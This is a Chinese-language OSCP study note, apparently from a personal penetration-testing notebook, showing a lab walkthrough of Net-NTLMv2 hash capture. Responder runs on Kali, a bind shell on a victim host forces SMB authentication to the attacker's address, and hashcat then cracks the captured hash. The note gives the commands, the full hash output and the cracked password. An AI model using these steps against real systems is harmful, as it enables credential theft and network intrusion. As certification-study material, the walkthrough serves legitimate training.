【SMB】【Net-NTLMv2雜湊監聽】Responder

現在讓我們進行這個過程。首先，我們需要運行ip a以檢索所有接口的列表。然後，我們將以sudo運行Responder（在Kali上已經預安裝），以啟用處理各種協議的特權原始套接字操作所需的權限。我們將使用-I設置監聽接口，請注意您的接口名稱可能與此處顯示的不同。

kali@kali:~$ ip a
...
3: tap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 42:11:48:1b:55:18 brd ff:ff:ff:ff:ff:ff
    inet 192.168.119.2/24 scope global tap0
       valid_lft forever preferred_lft forever
    inet6 fe80::4011:48ff:fe1b:5518/64 scope link 
       valid_lft forever preferred_lft forever

kali@kali:~$ sudo responder -I tap0 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
...
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
...
[+] Listening for events...

輸出顯示Responder現在正在聽取事件，並且SMB伺服器已啟用。

我們的下一步是使用paul的綁定外殼向我們的Responder SMB伺服器請求訪問一個不存在的SMB共享。我們將使用對\192.168.119.2\test執行簡單的dir列出命令，其中"test"是一個任意的目錄名稱。我們只關心身份驗證過程，而不是共享列表。

讓我們切換回包含我們的Netcat綁定外殼連接的終端選項卡，並輸入該命令。

C:\Windows\system32>dir \\192.168.119.2\test
dir \\192.168.119.2\test
Access is denied.

Responder標籤應該顯示如下內容：

...
[+] Listening for events... 
[SMB] NTLMv2-SSP Client   : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000
000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E
002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E00480
055005800430034005400490043002E00360057004D0052002E004C004F00430041004C000300140036005700
4D0052002E004C004F00430041004C0005001400360057004D0052002E004C004F00430041004C00070008000
0B050CD1777D801060004000200000008003000300000000000000000000000002000008BA7AF42BFD51D7009
0007951B57CB2F5546F7B599BC577CCD13187CFC5EF4790A00100000000000000000000000000000000000090
0240063006900660073002F003100390032002E003100360038002E003100310038002E003200000000000000
0000

這表示Responder成功捕獲了paul的Net-NTLMv2雜湊。我們將其保存到paul.hash文件中，以便使用Hashcat進行破解。在我們開始破解之前，讓我們檢索正確的模式。

kali@kali:~$ cat paul.hash   
paul::FILES01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B0
50CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00
340044004E00480055005800430034005400490043000400340057...

kali@kali:~$ hashcat --help | grep -i "ntlm"
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocol
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol
   1000 | NTLM                                                | Operating System

這個文件包含了paul的捕獲的Net-NTLMv2雜湊（在此清單中被裁剪了），根據Hashcat的說法，它的模式是5600（"NetNTLMv2"）。

現在讓我們嘗試使用rockyou.txt單詞列表來破解這個雜湊。密碼為:123Password123

kali@kali:~$ hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
...

PAUL::FILES01:1f9d4c51f6e74653:795f138ec69c274d0fd53bb32908a72b:01010000000000000
0b050cd1777d801b7585df5719acfba0000000002000800360057004d00520001001e00570049004e
002d00340044004e004800550058004300340054004900430004003400570049004e002d003400440
04e00480055005800430034005400490043002e00360057004d0052002e004c004f00430041004c00
03001400360057004d0052002e004c004f00430041004c0005001400360057004d0052002e004c004
f00430041004c000700080000b050cd1777d801060004000200000008003000300000000000000000
000000002000008ba7af42bfd51d70090007951b57cb2f5546f7b599bc577ccd13187cfc5ef4790a0
01000000000000000000000000000000000000900240063006900660073002f003100390032002e00
3100360038002e003100310038002e0032000000000000000000:123Password123
...

OSCP 筆記

Google haking

【Tunnel】Port forwarding and Tunneling

【Tip】關於 bash

【kali】未安裝工具

OSCP Recipe 2023

常用目錄/檔案

【php】php攻擊手法

【反向 shell】

【Linux】【列舉】常用命令

【Windows】【列舉】常用命令

【kali】解析度設定

【Ｗindows】【提權】Get-ObjectAcl 搜尋自己可管理帳號

【Windows】登入方法

【轉載】Emotet病毒惡意文件分析實例

【Mac】未安裝軟體

【Linux】【提權】相關指令

包包的解題思路

exam

【Data】SecLists

【Terminal】telnet

【Terminal】powercat

【Terminal】rlwrap

【web】【windows】【PowerShell】 iwr

【Shell】powershell

【shell】find

【online】【編碼】jscompress.com

【online】【編碼】CyberChef

【PortScan】netcat

【PortScan】nmap

【PortScan】rustscan

【GitHub】Gitrob 和 Gitleaks

【DNS】Host

【DNS】dnsrecon

【DNS】DNSEnum

【DNS】whois

【DNS】nslookup

【SMB】nbtscan

【SMB】WsgiDAV

【SMB】net view

【SMB】enum4linux

【SMB】smbclient

【SMB】【Remote】 CME ( CrackMapExec )

【SNMP】onesixtyone

【SNMP】snmpwalk

【Romote】xfreerdp rdesktop

【PathBuster】Gobuster

【linux】【提權】【弱掃】linpeas

【Linux】【提權】GTFOBins

【AD】【列舉】ADRecon

【AD】【列舉】BooldHound

【Exploit】SearchSploit

【Honeypot】canarytokens

【AD】【列舉】PowerView.ps1

【AD】【列舉】PsLoggedOn

【AD】【列舉】Get-Acl

【AD】net

【AD】【解碼】gpp-decrypt

【AD】【列舉】SharpHound

【列舉】wpscan

【SQL Injection】sqlmap

【file】【列舉】

【Linux】【列舉】linpeas

【web】【列舉】whatweb

【web】【爆破】burpsuite

【web】【爆破】gobuster

【terminal】php-reverse-shell

【web】【linux】【shell】curl

【sql】impacket-mssqlclient

【SQL_injection】github

【密碼】【破解】hashcat

【terminal】【impacket】psexec

【SMB】【Net-NTLMv2雜湊監聽】Responder

【shell】【impacket】ntlmrelayx

【列舉】【提權】【Linux】unix-privesc-check

【密碼】【字典】crunch

【破解】【SSH】Hydra

【列舉】【shell】getcap

【port forwarding】socat

【port forwarding】rinetd